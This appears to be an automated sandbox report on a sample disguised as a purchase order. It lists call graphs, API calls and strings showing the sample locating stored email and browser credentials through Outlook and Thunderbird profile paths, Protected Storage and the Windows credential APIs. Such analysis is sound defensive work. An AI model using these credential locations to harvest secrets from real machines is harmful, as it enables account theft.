33565->33430 33566->33436 33598 410a9c RegOpenKeyExA 33567->33598 33569 401c4c 33570 401cad 33569->33570 33599 410add RegQueryValueExA 33569->33599 33570->33439 33570->33441 33572 401c6a 33573 401c71 strchr 33572->33573 33574 401ca4 RegCloseKey 33572->33574 33573->33574 33575 401c85 strchr 33573->33575 33574->33570 33575->33574 33576 401c94 33575->33576 33600 406f06 strlen 33576->33600 33578 401ca1 33578->33574 33579->33442 33580->33427 33581->33433 33582->33454 33603 410a9c RegOpenKeyExA 33583->33603 33585 410b34 33586 410b5d 33585->33586 33604 410add RegQueryValueExA 33585->33604 33586->33454 33588 410b4c RegCloseKey 33588->33586 33590->33454 33591->33447 33593 4070bd GetVersionExA 33592->33593 33594 4070ce 33592->33594 33593->33594 33594->33553 33594->33557 33595->33559 33596->33562 33597->33564 33598->33569 33599->33572 33601 406f17 33600->33601 33602 406f1a memcpy 33600->33602 33601->33602 33602->33578 33603->33585 33604->33588 33606 409b40 33605->33606 33608 409b4e 33605->33608 33613 409901 memset SendMessageA 33606->33613 33609 409b99 33608->33609 33610 409b8b 33608->33610 33609->33471 33614 409868 SendMessageA 33610->33614 33612->33467 33613->33608 33614->33609 33615->33474 33617 410807 33616->33617 33618 4107fc FreeLibrary 33616->33618 33617->33476 33618->33617 33620 4107f1 FreeLibrary 33619->33620 33621 403c30 LoadLibraryA 33620->33621 33622 403c74 33621->33622 33623 403c44 GetProcAddress 33621->33623 33624 4107f1 FreeLibrary 33622->33624 33623->33622 33625 403c5e 33623->33625 33626 403c7b 33624->33626 33625->33622 33628 403c6b 33625->33628 33627 404734 3 API calls 33626->33627 33629 403c86 33627->33629 33628->33626 33708 4036e5 33629->33708 33632 4036e5 27 API calls 33633 403c9a 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403ca4 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403cae 33636->33637 33720 4085d2 33637->33720 33645 403ce5 33646 403cf7 33645->33646 33903 402bd1 40 API calls 33645->33903 33766 410a9c RegOpenKeyExA 33646->33766 33649 403d0a 33650 403d1c 33649->33650 33904 402bd1 40 API calls 33649->33904 33767 402c5d 33650->33767 33654 4070ae GetVersionExA 33655 403d31 33654->33655 33785 410a9c RegOpenKeyExA 33655->33785 33657 403d51 33658 403d61 33657->33658 33905 402b22 47 API calls 33657->33905 33786 410a9c RegOpenKeyExA 33658->33786 33661 403d87 33662 403d97 33661->33662 33906 402b22 47 API calls 33661->33906 33787 410a9c RegOpenKeyExA 33662->33787 33665 403dbd 33666 403dcd 33665->33666 33907 402b22 47 API calls 33665->33907 33788 410808 33666->33788 33670 404785 FreeLibrary 33671 403de8 33670->33671 33792 402fdb 33671->33792 33674 402fdb 34 API calls 33675 403e00 33674->33675 33808 4032b7 33675->33808 33684 403e3b 33686 403e73 33684->33686 33687 403e46 _mbscpy 33684->33687 33855 40fb00 33686->33855 33909 40f334 334 API calls 33687->33909 33695->33476 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33476 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33476 33706->33705 33707->33478 33709 4036fb 33708->33709 33712 4037c5 33708->33712 33910 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33709->33910 33711 40370e 33711->33712 33713 403716 strchr 33711->33713 33712->33632 33713->33712 33714 403730 33713->33714 33911 4021b6 memset 33714->33911 33716 40373f _mbscpy _mbscpy strlen 33717 4037a4 _mbscpy 33716->33717 33718 403789 sprintf 33716->33718 33912 4023e5 16 API calls 33717->33912 33718->33717 33721 4085e2 33720->33721 33913 4082cd 11 API calls 33721->33913 33725 408600 33726 403cba 33725->33726 33727 40860b memset 33725->33727 33738 40821d 33726->33738 33916 410b62 RegEnumKeyExA 33727->33916 33729 408637 33730 4086d2 RegCloseKey 33729->33730 33732 40865c memset 33729->33732 33917 410a9c RegOpenKeyExA 33729->33917 33920 410b62 RegEnumKeyExA 33729->33920 33730->33726 33918 410add RegQueryValueExA 33732->33918 33735 408694 33919 40848b 10 API calls 33735->33919 33737 4086ab RegCloseKey 33737->33729 33921 410a9c RegOpenKeyExA 33738->33921 33740 40823f 33741 403cc6 33740->33741 33742 408246 memset 33740->33742 33750 4086e0 33741->33750 33922 410b62 RegEnumKeyExA 33742->33922 33744 4082bf RegCloseKey 33744->33741 33746 40826f 33746->33744 33923 410a9c RegOpenKeyExA 33746->33923 33924 4080ed 11 API calls 33746->33924 33925 410b62 RegEnumKeyExA 33746->33925 33749 4082a2 RegCloseKey 33749->33746 33926 4045db 33750->33926 33755 408737 wcslen 33756 4088ef 33755->33756 33762 40876a 33755->33762 33934 404656 33756->33934 33757 40877a wcsncmp 33757->33762 33759 404734 3 API calls 33759->33762 33760 404785 FreeLibrary 33760->33762 33761 408812 memset 33761->33762 33763 40883c memcpy wcschr 33761->33763 33762->33756 33762->33757 33762->33759 33762->33760 33762->33761 33762->33763 33764 4088c3 LocalFree 33762->33764 33937 40466b _mbscpy 33762->33937 33763->33762 33764->33762 33765 410a9c RegOpenKeyExA 33765->33645 33766->33649 33938 410a9c RegOpenKeyExA 33767->33938 33769 402c7a 33770 402da5 33769->33770 33771 402c87 memset 33769->33771 33770->33654 33939 410b62 RegEnumKeyExA 33771->33939 33773 402d9c RegCloseKey 33773->33770 33774 410b1e 3 API calls 33775 402ce4 memset sprintf 33774->33775 33940 410a9c RegOpenKeyExA 33775->33940 33777 402d28 33778 402d3a sprintf 33777->33778 33941 402bd1 40 API calls 33777->33941 33942 410a9c RegOpenKeyExA 33778->33942 33781 402cb2 33781->33773 33781->33774 33784 402d9a 33781->33784 33943 402bd1 40 API calls 33781->33943 33944 410b62 RegEnumKeyExA 33781->33944 33784->33773 33785->33657 33786->33661 33787->33665 33789 410816 33788->33789 33790 4107f1 FreeLibrary 33789->33790 33791 403ddd 33790->33791 33791->33670 33945 410a9c RegOpenKeyExA 33792->33945 33794 402ff9 33795 403006 memset 33794->33795 33796 40312c 33794->33796 33946 410b62 RegEnumKeyExA 33795->33946 33796->33674 33798 403122 RegCloseKey 33798->33796 33799 410b1e 3 API calls 33800 403058 memset sprintf 33799->33800 33947 410a9c RegOpenKeyExA 33800->33947 33802 403033 33802->33798 33802->33799 33803 4030a2 memset 33802->33803 33804 410b62 RegEnumKeyExA 33802->33804 33806 4030f9 RegCloseKey 33802->33806 33949 402db3 26 API calls 33802->33949 33948 410b62 RegEnumKeyExA 33803->33948 33804->33802 33806->33802 33809 4032d5 33808->33809 33810 4033a9 33808->33810 33950 4021b6 memset 33809->33950 33823 4034e4 memset memset 33810->33823 33812 4032e1 33951 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33812->33951 33814 4032ea 33815 4032f8 memset GetPrivateProfileSectionA 33814->33815 33952 4023e5 16 API calls 33814->33952 33815->33810 33820 40332f 33815->33820 33817 40339b strlen 33817->33810 33817->33820 33819 403350 strchr 33819->33820 33820->33810 33820->33817 33953 4021b6 memset 33820->33953 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33820->33954 33955 4023e5 16 API calls 33820->33955 33824 410b1e 3 API calls 33823->33824 33825 40353f 33824->33825 33826 40357f 33825->33826 33827 403546 _mbscpy 33825->33827 33831 403985 33826->33831 33956 406d55 strlen _mbscat 33827->33956 33829 403565 _mbscat 33957 4033f0 19 API calls 33829->33957 33958 40466b _mbscpy 33831->33958 33835 4039aa 33837 4039ff 33835->33837 33959 40f460 memset memset 33835->33959 33980 40f6e2 33835->33980 33998 4038e8 21 API calls 33835->33998 33838 404785 FreeLibrary 33837->33838 33839 403a0b 33838->33839 33840 4037ca memset memset 33839->33840 34006 444551 memset 33840->34006 33843 4038e2 33843->33684 33908 40f334 334 API calls 33843->33908 33845 40382e 33846 406f06 2 API calls 33845->33846 33847 403843 33846->33847 33848 406f06 2 API calls 33847->33848 33849 403855 strchr 33848->33849 33850 403884 _mbscpy 33849->33850 33851 403897 strlen 33849->33851 33853 4038bf _mbscpy 33850->33853 33852 4038a4 sprintf 33851->33852 33851->33853 33852->33853 34018 4023e5 16 API calls 33853->34018 33856 44b090 33855->33856 33857 40fb10 RegOpenKeyExA 33856->33857 33858 403e7f 33857->33858 33859 40fb3b RegOpenKeyExA 33857->33859 33869 40f96c 33858->33869 33860 40fb55 RegQueryValueExA 33859->33860 33861 40fc2d RegCloseKey 33859->33861 33862 40fc23 RegCloseKey 33860->33862 33863 40fb84 33860->33863 33861->33858 33862->33861 33864 404734 3 API calls 33863->33864 33865 40fb91 33864->33865 33865->33862 33866 40fc19 LocalFree 33865->33866 33867 40fbdd memcpy memcpy 33865->33867 33866->33862 34023 40f802 11 API calls 33867->34023 33870 4070ae GetVersionExA 33869->33870 33871 40f98d 33870->33871 33872 4045db 7 API calls 33871->33872 33873 40f9a9 33872->33873 33874 40fae6 33873->33874 33876 40f9bf CredEnumerateW 33873->33876 33878 40f9d1 33873->33878 33875 404656 FreeLibrary 33874->33875 33877 403e85 33875->33877 33876->33878 33883 4442ea memset 33877->33883 33878->33874 33879 40fa13 memset WideCharToMultiByte 33878->33879 33879->33878 33880 40fa43 _strnicmp 33879->33880 33880->33878 33881 40fa5b WideCharToMultiByte 33880->33881 33881->33878 33882 40fa88 WideCharToMultiByte 33881->33882 33882->33878 33884 410dbb 9 API calls 33883->33884 33885 444329 33884->33885 34024 40759e strlen strlen 33885->34024 33890 410dbb 9 API calls 33891 444350 33890->33891 33892 40759e 3 API calls 33891->33892 33893 44435a 33892->33893 33894 444212 65 API calls 33893->33894 33895 444366 memset memset 33894->33895 33896 410b1e 3 API calls 33895->33896 33897 4443b9 ExpandEnvironmentStringsA strlen 33896->33897 33898 4443f4 _strcmpi 33897->33898 33899 4443e5 33897->33899 33900 403e91 33898->33900 33901 44440c 33898->33901 33899->33898 33900->33476 33902 444212 65 API calls 33901->33902 33902->33900 33903->33646 33904->33650 33905->33658 33906->33662 33907->33666 33908->33684 33909->33686 33910->33711 33911->33716 33912->33712 33914 40841c 33913->33914 33915 410a9c RegOpenKeyExA 33914->33915 33915->33725 33916->33729 33917->33729 33918->33735 33919->33737 33920->33729 33921->33740 33922->33746 33923->33746 33924->33749 33925->33746 33927 404656 FreeLibrary 33926->33927 33928 4045e3 LoadLibraryA 33927->33928 33929 404651 33928->33929 33930 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33928->33930 33929->33755 33929->33756 33931 40463d 33930->33931 33932 404643 33931->33932 33933 404656 FreeLibrary 33931->33933 33932->33929 33933->33929 33935 403cd2 33934->33935 33936 40465c FreeLibrary 33934->33936 33935->33765 33936->33935 33937->33762 33938->33769 33939->33781 33940->33777 33941->33778 33942->33781 33943->33781 33944->33781 33945->33794 33946->33802 33947->33802 33948->33802 33949->33802 33950->33812 33951->33814 33952->33815 33953->33819 33954->33820 33955->33820 33956->33829 33957->33826 33958->33835 33999 4078ba 33959->33999 33962 4078ba _mbsnbcat 33963 40f5a3 RegOpenKeyExA 33962->33963 33964 40f5c3 RegQueryValueExA 33963->33964 33965 40f6d9 33963->33965 33966 40f6d0 RegCloseKey 33964->33966 33967 40f5f0 33964->33967 33965->33835 33966->33965 33967->33966 33968 40f675 33967->33968 34003 40466b _mbscpy 33967->34003 33968->33966 34004 4012ee strlen 33968->34004 33970 40f611 33972 404734 3 API calls 33970->33972 33977 40f616 33972->33977 33973 40f69e RegQueryValueExA 33973->33966 33974 40f6c1 33973->33974 33974->33966 33975 40f66a 33976 404785 FreeLibrary 33975->33976 33976->33968 33977->33975 33978 40f661 LocalFree 33977->33978 33979 40f645 memcpy 33977->33979 33978->33975 33979->33978 34005 40466b _mbscpy 33980->34005 33982 40f6fa 33983 4045db 7 API calls 33982->33983 33984 40f708 33983->33984 33985 40f7e2 33984->33985 33986 404734 3 API calls 33984->33986 33987 404656 FreeLibrary 33985->33987 33988 40f715 33986->33988 33989 40f7f1 33987->33989 33988->33985 33990 40f71d CredReadA 33988->33990 33991 404785 FreeLibrary 33989->33991 33990->33985 33993 40f734 33990->33993 33992 40f7fc 33991->33992 33992->33835 33993->33985 33993->33993 33994 40f797 WideCharToMultiByte 33993->33994 33995 40f7b8 strlen 33994->33995 33996 40f7d9 LocalFree 33994->33996 33995->33996 33997 40f7c8 _mbscpy 33995->33997 33996->33985 33997->33996 33998->33835 34000 4078e6 33999->34000 34001 4078c7 _mbsnbcat 34000->34001 34002 4078ea 34000->34002 34001->34000 34002->33962 34003->33970 34004->33973 34005->33982 34019 410a9c RegOpenKeyExA 34006->34019 34008 44458b 34009 40381a 34008->34009 34020 410add RegQueryValueExA 34008->34020 34009->33843 34017 4021b6 memset 34009->34017 34011 4445dc RegCloseKey 34011->34009 34012 4445a4 34012->34011 34021 410add RegQueryValueExA 34012->34021 34014 4445c1 34014->34011 34022 444879 30 API calls 34014->34022 34016 4445da 34016->34011 34017->33845 34018->33843 34019->34008 34020->34012 34021->34014 34022->34016 34023->33866 34025 4075c9 34024->34025 34026 4075bb _mbscat 34024->34026 34027 444212 34025->34027 34026->34025 34044 407e9d 34027->34044 34030 44424d 34031 444274 34030->34031 34032 444258 34030->34032 34052 407ef8 34030->34052 34033 407e9d 9 API calls 34031->34033 34065 444196 52 API calls 34032->34065 34040 4442a0 34033->34040 34035 407ef8 9 API calls 34035->34040 34036 4442ce 34062 407f90 34036->34062 34040->34035 34040->34036 34042 444212 65 API calls 34040->34042 34066 407e62 strcmp strcmp 34040->34066 34041 407f90 FindClose 34043 4442e4 34041->34043 34042->34040 34043->33890 34045 407f90 FindClose 34044->34045 34046 407eaa 34045->34046 34047 406f06 2 API calls 34046->34047 34048 407ebd strlen strlen 34047->34048 34049 407ee1 34048->34049 34050 407eea 34048->34050 34067 4070e3 strlen _mbscat _mbscpy _mbscat 34049->34067 34050->34030 34053 407f03 FindFirstFileA 34052->34053 34054 407f24 FindNextFileA 34052->34054 34055 407f3f 34053->34055 34056 407f46 strlen strlen 34054->34056 34057 407f3a 34054->34057 34055->34056 34059 407f7f 34055->34059 34056->34059 34060 407f76 34056->34060 34058 407f90 FindClose 34057->34058 34058->34055 34059->34030 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34060->34068 34063 407fa3 34062->34063 34064 407f99 FindClose 34062->34064 34063->34041 34064->34063 34065->34030 34066->34040 34067->34050 34068->34059 34069->33490 34070->33494 34071->33501 34072->33500 34073->33507 34074->33504 34075->33499 34420 43ffc8 18 API calls 34234 4281cc 15 API calls __fprintf_l 34422 4383cc 110 API calls __fprintf_l 34235 4275d3 41 API calls 34423 4153d3 22 API calls __fprintf_l 34236 444dd7 _XcptFilter 34428 4013de 15 API calls 34430 425115 111 API calls __fprintf_l 34431 43f7db 18 API calls 34434 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34238 4335ee 16 API calls __fprintf_l 34436 429fef 11 API calls 34239 444deb _exit _c_exit 34437 40bbf0 138 API calls 34242 425115 79 API calls __fprintf_l 34441 437ffa 22 API calls 34246 4021ff 14 API calls 34247 43f5fc 149 API calls 34442 40e381 9 API calls 34249 405983 40 API calls 34250 42b186 27 API calls __fprintf_l 34251 427d86 76 API calls 34252 403585 20 API calls 34254 42e58e 18 API calls __fprintf_l 34257 425115 75 API calls __fprintf_l 34259 401592 8 API calls 33157 410b92 33160 410a6b 33157->33160 33159 410bb2 33161 410a77 33160->33161 33162 410a89 GetPrivateProfileIntA 33160->33162 33165 410983 memset _itoa WritePrivateProfileStringA 33161->33165 33162->33159 33164 410a84 33164->33159 33165->33164 34446 434395 16 API calls 34261 441d9c memcmp 34448 43f79b 119 API calls 34262 40c599 43 API calls 34449 426741 87 API calls 34266 4401a6 21 API calls 34268 426da6 memcpy memset memset memcpy 34269 4335a5 15 API calls 34271 4299ab memset memset memcpy memset memset 34272 40b1ab 8 API calls 34454 425115 76 API calls __fprintf_l 34458 4113b2 18 API calls 2 library calls 34462 40a3b8 memset sprintf SendMessageA 34076 410bbc 34079 4109cf 34076->34079 34080 4109dc 34079->34080 34081 410a23 memset GetPrivateProfileStringA 34080->34081 34082 4109ea memset 34080->34082 34087 407646 strlen 34081->34087 34092 4075cd sprintf memcpy 34082->34092 34085 410a65 34086 410a0c WritePrivateProfileStringA 34086->34085 34088 40765a 34087->34088 34089 40765c 34087->34089 34088->34085 34091 4076a3 34089->34091 34093 40737c strtoul 34089->34093 34091->34085 34092->34086 34093->34089 34274 40b5bf memset memset _mbsicmp

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
                                                              • strlen.MSVCRT ref: 00407F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 1846531875-4223776976
                                                              • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                              Strings
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
